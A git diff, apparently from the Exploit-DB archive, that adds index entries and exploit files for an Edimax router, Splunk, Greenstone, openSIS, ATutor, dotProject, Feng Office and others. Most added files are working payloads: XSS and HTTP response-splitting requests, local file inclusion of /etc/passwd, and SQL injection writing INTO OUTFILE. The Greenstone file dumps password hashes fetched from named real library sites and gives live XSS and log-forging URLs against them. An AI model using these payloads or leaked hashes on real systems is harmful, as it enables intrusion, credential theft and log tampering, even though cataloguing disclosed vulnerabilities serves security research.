diff --git a/files.csv b/files.csv
index 32c2ce976..ef2ab64e2 100755
--- a/files.csv
+++ b/files.csv
@@ -34348,3 +34348,22 @@ id,file,description,date,author,platform,type,port
38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection Vulnerability",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0
38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0
38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements Rootpipe Privilege Escalation",2015-08-31,metasploit,osx,local,0
+38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 Cross Site Request Forgery Vulnerability",2012-11-16,"Aung Khant",php,webapps,0
+38038,platforms/multiple/dos/38038.txt,"Splunk <= 4.3.1 Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0
+38039,platforms/php/webapps/38039.txt,"openSIS 'modname' Parameter Local File Include Vulnerability",2012-11-20,"Julian Horoszkiewicz",php,webapps,0
+38040,platforms/php/webapps/38040.txt,"ATutor 'tool_file' Parameter Local File Include Vulnerability",2012-11-16,"Julian Horoszkiewicz",php,webapps,0
+38041,platforms/php/webapps/38041.txt,"WordPress Madebymilk Theme 'id' Parameter SQL Injection Vulnerability",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0
+38042,platforms/php/webapps/38042.txt,"dotProject 2.1.x index.php Multiple Parameter SQL Injection",2012-11-21,"High-Tech Bridge",php,webapps,0
+38043,platforms/php/webapps/38043.txt,"dotProject 2.1.x index.php Multiple Parameter XSS",2012-11-21,"High-Tech Bridge",php,webapps,0
+38044,platforms/php/webapps/38044.txt,"Feng Office Security Bypass and HTML Injection Vulnerabilities",2012-11-21,Ur0b0r0x,php,webapps,0
+38045,platforms/php/webapps/38045.html,"XiVO Cross-Site Request Forgery Vulnerability",2012-11-21,"Francis Provencher",php,webapps,0
+38046,platforms/php/webapps/38046.txt,"WordPress Zingiri Web Shop Plugin 'path' Parameter Arbitrary File Upload Vulnerability",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0
+38047,platforms/php/webapps/38047.txt,"WordPress Webplayer Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-22,"Novin hack",php,webapps,0
+38048,platforms/php/webapps/38048.txt,"WordPress Plg Novana Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-22,sil3nt,php,webapps,0
+38049,platforms/multiple/remote/38049.txt,"Greenstone Multiple Security Vulnerabilities",2012-11-23,AkaStep,multiple,remote,0
+38050,platforms/php/webapps/38050.txt,"WordPress Zarzadzonie Kontem Plugin 'ajaxfilemanager.php' Script Arbitrary File Upload Vulnerability",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0
+38051,platforms/php/webapps/38051.txt,"Bedita 3.5.1 - XSS Vulnerabilities",2015-09-01,"Sébastien Morin",php,webapps,80
+38053,platforms/windows/dos/38053.txt,"Mpxplay Multimedia Commander 2.00a - .m3u Stack-Based Buffer Overflow",2015-09-01,"_ Un_N0n _",windows,dos,0
+38054,platforms/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where PoC",2015-09-01,KoreLogic,windows,dos,0
+38055,platforms/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write PoC",2015-09-01,KoreLogic,windows,dos,0
+38056,platforms/hardware/webapps/38056.txt,"Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities",2015-09-01,smash,hardware,webapps,80
diff --git a/platforms/hardware/webapps/38056.txt b/platforms/hardware/webapps/38056.txt
new file mode 100755
index 000000000..81048a7b6
--- /dev/null
+++ b/platforms/hardware/webapps/38056.txt
@@ -0,0 +1,156 @@
+# Title: Edimax BR6228nS/BR6228nC - Multiple vulnerabilities
+# Date: 01.09.15
+# Vendor: edimax.com
+# Firmware version: 1.22
+# Author: Smash_
+# Contact: smash [at] devilteam.pl
+
+Few vulnerabilities found in Edimax BR6228nS/BR6228nC router firmware.
+
+
+1/ Cross Site Scripting
+
+Request:
+POST /goform/formWizSetup HTTP/1.1
+Host: 192.168.0.10:8080
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.10:8080/main.asp
+Cookie: language=0
+Authorization: Basic YWRtaW46MTIzNA==
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 33
+
+setPage=x");alert("X&wizEnabled=1
+
+Response:
+HTTP/1.0 200 OK
+Server: GoAhead-Webs
+
+
+
+
+
+
+2/ HTTP Response Splitting
+
+Request:
+POST /goform/formReflashClientTbl HTTP/1.1
+Host: 192.168.0.10:8080
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.10:8080/stadhcptbl.asp
+Cookie: language=0
+Authorization: Basic YWRtaW46MTIzNA==
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 163
+
+submit-url=%2Fstadhcptbl.asp%0d%0aXXX%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a
+
+Response:
+HTTP/1.0 302 Redirect
+Server: GoAhead-Webs
+Date: Fri Nov 16 18:08:51 2012
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+Location: http://192.168.0.10:8080/stadhcptbl.asp
+XXX
+Content-Length: 0
+
+HTTP/1.1 200 OK
+Content-Type: text/html
+
+
+
+
+
+3/ Cross Site Request Forgery
+
+Examples:
+
+
+
+
+
+
+
+
+ -
+
+
+
+
+
+
+
+
+ -
+
+
+
+
+
+
+
+
+
+
+4/ Unprotected files
+
+Following url's can be requested without http authorisation in order to obtain detail informations about router:
+
+http://192.168.0.10:8080/FUNCTION_SCRIPT
+http://192.168.0.10:8080/main.asp
+
+Example:
+
+devil@hell:~$ curl -ig http://192.168.0.10:8080/
+HTTP/1.1 401 Unauthorized
+Server: GoAhead-Webs
+Date: Fri Nov 16 18:28:39 2012
+WWW-Authenticate: Basic realm="Default: admin/1234"
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+
+devil@hell:~$ curl -ig http://192.168.0.10:8080/FUNCTION_SCRIPT
+HTTP/1.0 200 OK
+Date: Fri Nov 16 18:28:47 2012
+Server: GoAhead-Webs
+Last-modified: Fri Nov 16 09:57:30 2012
+Content-length: 997
+Content-type: text/html
+
+_DATE_="2012.11.16-17:51:47"
+_VERSION_="1.22"
+_MODEL_="BR6228GNS"
+_MODE_="EdimaxOBM"
+_PLATFORM_="RTL8196C_1200"
+_HW_LED_WPS_="4"
+_HW_LED_POWER_="6"
+_HW_LED_WIRELESS_="2"
+_HW_LED_USB_="17"
+_HW_BUTTON_RESET_="5"
+(...)
\ No newline at end of file
diff --git a/platforms/multiple/dos/38038.txt b/platforms/multiple/dos/38038.txt
new file mode 100755
index 000000000..5d83ab6e7
--- /dev/null
+++ b/platforms/multiple/dos/38038.txt
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/56581/info
+
+Splunk is prone to multiple cross-site scripting vulnerabilities and a denial-of-service vulnerability because it fails to properly handle user-supplied input.
+
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+"--splunk-cooked-mode-v3--\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+\0\0\0\0.\0\0\0\SOH\0\0\0\DC3__s2s_capabilities\0\0\0
+\0\STXA\0\0\0\0\0\0\0\0\ENQ_raw\0"
diff --git a/platforms/multiple/remote/38049.txt b/platforms/multiple/remote/38049.txt
new file mode 100755
index 000000000..05a46aedd
--- /dev/null
+++ b/platforms/multiple/remote/38049.txt
@@ -0,0 +1,311 @@
+source: http://www.securityfocus.com/bid/56662/info
+
+Greenstone is prone to the following security vulnerabilities:
+
+1. A file-disclosure vulnerability
+2. A cross-site scripting vulnerability
+3. A security weakness
+4. A security-bypass vulnerability
+
+Attackers can exploit these issues to view local files, bypass certain security restriction, steal cookie-based authentication, or execute arbitrary scripts in the context of the browser.
+
+=================Let's Roll============================
+
+
+Password file disclosure:
+
+http://greenstone.flib.sci.am/gsdl/etc/users.gdb
+http://greenstone.flib.sci.am/gsdl/etc/key.gdb
+http://greenstone.martinique.univ-ag.fr/gsdl/etc/users.db
+http://greenstone.martinique.univ-ag.fr/gsdl/etc/key.db
+
+Example:
+(P.S Password encryption: Des (Unix))
+===================== Reproduce =====================
+$ wget http://greenstone.flib.sci.am/gsdl/etc/users.gdb && cat users.gdb
+--2012-11-22 17:04:39-- http://greenstone.flib.sci.am/gsdl/etc/users.gdb
+Resolving greenstone.flib.sci.am (greenstone.flib.sci.am)... 93.187.162.197
+Connecting to greenstone.flib.sci.am (greenstone.flib.sci.am)|93.187.162.197|:80... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 12926 (13K) [text/plain]
+Saving to: `users.gdb'
+
+100%[==========================================>] 12,926 31.8K/s in 0.4s
+
+2012-11-22 17:04:40 (31.8 KB/s) - `users.gdb' saved [12926/12926]
+.......Some junk snip........
+... admincreated at install time
+true
+administrator,colbuilder,all-collections-editor
+TpM5gyFpfCsLc
+admindemoDummy 'demo' user with password 'demo' for authen-e collection
+true
+demo
+Tpp90HTz/jz9w
+demotatevik
+true
+all-collections-editor
+Tpyq8s1oUIioc
+tatevik
+azgayin
+true
+all-collections-editor
+Tp53Vsj1qM4cE
+azgayin
+demoDummy 'demo' user with password 'demo' for authen-e collection
+true
+demo
+TpzWMQXVfKFvw
+demo
+
+========================= END OF users.gbd============================
+
+
+Known salt issuse (because this application uses "setpasswd" utility via
+hardcoded salt=>: Tp)
+(Especially on windows systems)
+
+
+
+================================BEGIN================================
+/**********************************************************************
+ *
+ * setpasswd.cpp --
+ * Copyright (C) 2000 The New Zealand Digital Library Project
+ *
+ * A component of the Greenstone digital library software
+ * from the New Zealand Digital Library Project at the
+ * University of Waikato, New Zealand.
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *
+ *********************************************************************/
+
+// setpasswd is a windows application that can be used to encrypt a password
+// and write it (along with its corresponding username) to a gdbm database.
+
+// it handles writing to the gdbm database itself to avoid having to call
+// the txt2db console application (and therefore avoiding the console
+// window popping up when called from another windows application).
+
+// note that setpasswd does no checking to make sure that any of it's
+// input arguments are valid (or even reasonable) values.
+
+// this program should be compiled into a binary called setpw.exe (to be
+// short enough not to mess with 16 bit Windows platforms).
+
+// usage:
+// setpw -u username -p password -o output_gdbm_file
+
+#include "text_t.h"
+#include "crypt.h"
+#include "autoconf.h"
+#include "systems.h"
+#include "gdbmconst.h"
+#include "gdbm.h"
+
+#include
+
+text_t username;
+text_t password;
+text_t output_gdbm_file;
+
+bool parse_cmdline (LPSTR cmdline) {
+
+ bool in_quote = false;
+ text_t arg;
+ text_tarray args;
+ unsigned char *c = (unsigned char *)cmdline;
+ while (*c != '\0') {
+ if (*c == '"') {
+ if (!in_quote) {
+ in_quote = true;
+ } else {
+ in_quote = false;
+ if (!arg.empty()) args.push_back (arg);
+ arg.clear();
+ }
+ } else if (*c == ' ' && !in_quote) {
+ if (!arg.empty()) args.push_back (arg);
+ arg.clear();
+ } else {
+ arg.push_back (*c);
+ }
+ ++c;
+ }
+ if (!arg.empty()) args.push_back (arg);
+
+ text_tarray::const_iterator here = args.begin();
+ text_tarray::const_iterator end = args.end();
+ while (here != end) {
+ if (*here == "-u" && (++here != end)) username = *here;
+ else if (*here == "-p" && (++here != end)) password = *here;
+ else if (*here == "-o" && (++here != end)) output_gdbm_file = *here;
+ if (here != end) ++here;
+ }
+ if (username.empty() || password.empty() || output_gdbm_file.empty()) {
+ MessageBox (NULL, "Usage:\n setpasswd -u username -p password -o output_gdbm_file",
+ "setpasswd failed", MB_OK);
+ return false;
+ }
+ return true;
+}
+
+text_t crypt_text (const text_t &text) {
+ static const char *salt = "Tp";
+ text_t crypt_password;
+
+ if (text.empty()) return "";
+
+ // encrypt the password
+ char *text_cstr = text.getcstr();
+ if (text_cstr == NULL) return "";
+ crypt_password = crypt(text_cstr, salt);
+ delete []text_cstr;
+
+ return crypt_password;
+}
+
+bool add_to_db () {
+
+ int block_size = 0;
+ GDBM_FILE dbf;
+ char *dbname = output_gdbm_file.getcstr();
+
+ // open the database
+ int read_write = GDBM_WRCREAT;
+ dbf = gdbm_open (dbname, block_size, read_write, 00664, NULL, 1);
+ if (dbf == NULL) {
+ MessageBox (NULL, "gdbm_open failed\n", "setpasswd", MB_OK);
+ return false;
+ }
+
+ datum key_data;
+ key_data.dptr = username.getcstr();
+ if (key_data.dptr == NULL) {
+ MessageBox (NULL, "null key_data\n", "setpasswd", MB_OK);
+ return false;
+ }
+ key_data.dsize = strlen(key_data.dptr);
+
+ text_t value = "\n";
+ value += "true\n";
+ value += "administrator,colbuilder\n";
+ value += "" + password + "\n";
+ value += "" + username + "\n";
+
+ datum value_data;
+ value_data.dptr = value.getcstr();
+ if (value_data.dptr == NULL) {
+ MessageBox (NULL, "null value_data\n", "setpasswd", MB_OK);
+ return false;
+ }
+ value_data.dsize = strlen(value_data.dptr);
+
+ // store the value
+ if (gdbm_store (dbf, key_data, value_data, GDBM_REPLACE) < 0) {
+ MessageBox (NULL, "gdbm_store failed\n", "setpasswd", MB_OK);
+ return false;
+ }
+ gdbm_close (dbf);
+
+ delete []key_data.dptr;
+ delete []value_data.dptr;
+ delete []dbname;
+ return true;
+}
+
+int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
+ LPSTR lpCmdLine, int nCmdShow) {
+
+ // parse command line arguments
+ if (!parse_cmdline (lpCmdLine)) return 1;
+
+ // encrypt the password
+ password = crypt_text (password);
+
+ // append the password and username to database
+ add_to_db();
+
+ return 0;
+}
+
+============================================================
+
+XSS:
+
+site.tld/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=
+Demo:
+http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E
+
+http://greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E%20%3E%3E%20greenstone.flib.greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E
+
+http://greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=%22%3E%3Cscript%3Ealert%28%22Again%20Owned%22%29;%3C/script%3E&pr=7&c=AkaStep
+
+
+============================================================
+
+
+
+Log forging:
+
+http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?e=4?e=%223"%0D%0A%0D%0AWarning: Accepted connection from unknown host to local port: 22 root logged in%29%0D%0A%0D%0A" cmd.exe
+
+
+http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?e=4?e=%223%0D%0A%0D%0AError%20D:\Program%20Files\Greenstone\%20directory%20owned?%29%0D%0A%0D%0A
+
+
+Forged log: http://greenstone.unam.na/gsdl/etc/error.txt (CTRL+F and search for: host to local port: 22)
+
+Example:
+
+===================EXAMPLE OF =FORGED LOG====================
+Error: the action "4?e="3"
+
+
+
+Warning: Accepted connection from unknown host to local port: 22 root logged in) <==Fake entry for Panic system administrator))))))
+
+
+
+" cmd.exe" could not be found.
+
+================END OF FORGED LOG=============
+
+Log File Poisoning: (Usefull for LFI)
+www.bibliotecamuseodelamemoria.cl/gsdl/cgi-bin/library.cgi?e=4?e="%0d%0a%0d%0a%00%00
+
+Poisoned Log can be found in the following places:
+site/gsdl/etc/error.txt
+or
+site/etc/error.txt (<=On Windows systems in ex i found it here)
+
+
+
+
+Example of injected log:
+==================================
+
+http://greenstone.unam.na/gsdl/etc/error.txt
+
+
+Error: the action "4?e="
+
+
+
+.." could not be found.
+==================================
+
+******************** The End *******************
diff --git a/platforms/php/webapps/38037.html b/platforms/php/webapps/38037.html
new file mode 100755
index 000000000..c786350e5
--- /dev/null
+++ b/platforms/php/webapps/38037.html
@@ -0,0 +1,61 @@
+source: http://www.securityfocus.com/bid/56580/info
+
+Open-Realty is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized administrative actions and gain access to the affected application. Other attacks are also possible.
+
+Open-Realty 2.5.8 and prior versions are vulnerable; other versions may also be affected.
+
+
+
diff --git a/platforms/php/webapps/38039.txt b/platforms/php/webapps/38039.txt
new file mode 100755
index 000000000..56b7ee0da
--- /dev/null
+++ b/platforms/php/webapps/38039.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56598/info
+
+openSIS is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.
+
+openSIS 5.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/opensis5.1/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
\ No newline at end of file
diff --git a/platforms/php/webapps/38040.txt b/platforms/php/webapps/38040.txt
new file mode 100755
index 000000000..76bc88f1e
--- /dev/null
+++ b/platforms/php/webapps/38040.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56600/info
+
+ATutor is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
+
+ATutor 2.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ATutor-2.1/ATutor/mods/_core/tool_manager/index.php?h=1&tool_file=./../../../../../../../../../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/38041.txt b/platforms/php/webapps/38041.txt
new file mode 100755
index 000000000..f0fb73538
--- /dev/null
+++ b/platforms/php/webapps/38041.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56608/info
+
+The Madebymilk theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+https://www.example.com/wp-content/plugins/madebymilk/voting-popup.php?id=null'
\ No newline at end of file
diff --git a/platforms/php/webapps/38042.txt b/platforms/php/webapps/38042.txt
new file mode 100755
index 000000000..f3b7fd62f
--- /dev/null
+++ b/platforms/php/webapps/38042.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/56624/info
+
+Dotproject is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+
+2. Multiple cross-site scripting vulnerabilities
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Dotproject versions prior to 2.1.7 are vulnerable.
+
+http://www.example.com/index.php?m=contacts&search_string=0%27%29%20UNION%20SELECT%20version(),2,3,4,5,6,7,8, 9,10,11%20INTO%20OUTFILE%20%27file.txt%27%20--%202
+http://www.example.com/index.php?m=contacts&where=%27%29%20UNION%20SELECT%20version(),2,3,4,5,6,7,8,9,10,11%2 0INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202
+http://www.example.com/index.php?m=departments&dept_id=%27%20UNION%20SELECT%20version%28%29%20INTO%20OUTFILE% 20%27/tmp/file.txt%27%20--%202
+http://www.example.com/?m=projects&update_project_status=1&project_status=1&project_id[]=%27%20UNION%20SELECT %20version%28%29%20INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202
+http://www.example.com/?m=system&a=billingcode&company_id=0%20UNION%20SELECT%201,2,3,4,5,6%20INTO%20OUTFILE%2 0%27/tmp/file.txt%27%20--%202
\ No newline at end of file
diff --git a/platforms/php/webapps/38043.txt b/platforms/php/webapps/38043.txt
new file mode 100755
index 000000000..3e4a9e399
--- /dev/null
+++ b/platforms/php/webapps/38043.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/56624/info
+
+Dotproject is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+
+2. Multiple cross-site scripting vulnerabilities
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Dotproject versions prior to 2.1.7 are vulnerable.
+
+http://www.example.com/?m=public&a=color_selector&callback=%3C/script%3E%3Cscript%3Ealert%28document.cookie%2 9;%3C/script%3E
+http://www.example.com/?m=public&a=date_format&field=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E
+http://www.example.com/index.php?m=contacts&a=addedit&contact_id=0&company_id=1&company_name=%22%20onmouseove r=%22javascript:alert%28document.cookie%29%22
+http://www.example.com/index.php?a=day_view&date=%22%20onmouseover=%22javascript:alert%28document.cookie%29%2 2
\ No newline at end of file
diff --git a/platforms/php/webapps/38044.txt b/platforms/php/webapps/38044.txt
new file mode 100755
index 000000000..697ea93f5
--- /dev/null
+++ b/platforms/php/webapps/38044.txt
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/56626/info
+
+Feng Office is prone to a security-bypass vulnerability and an HTML-injection vulnerability.
+
+An attacker may leverage the HTML-injection issue to inject hostile HTML and script code that would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. The attacker may leverage the security-bypass issue to bypass certain security restrictions and perform unauthorized actions in the affected application.
+
+Feng Office 2.2.1 and 2.0 Beta 3 are vulnerable; other versions may also be affected.
+
+# Expl0it/P0c/Xss ###################
+
+
+# Expl0it/P0c/Privilege Escalation ###################
+
+
+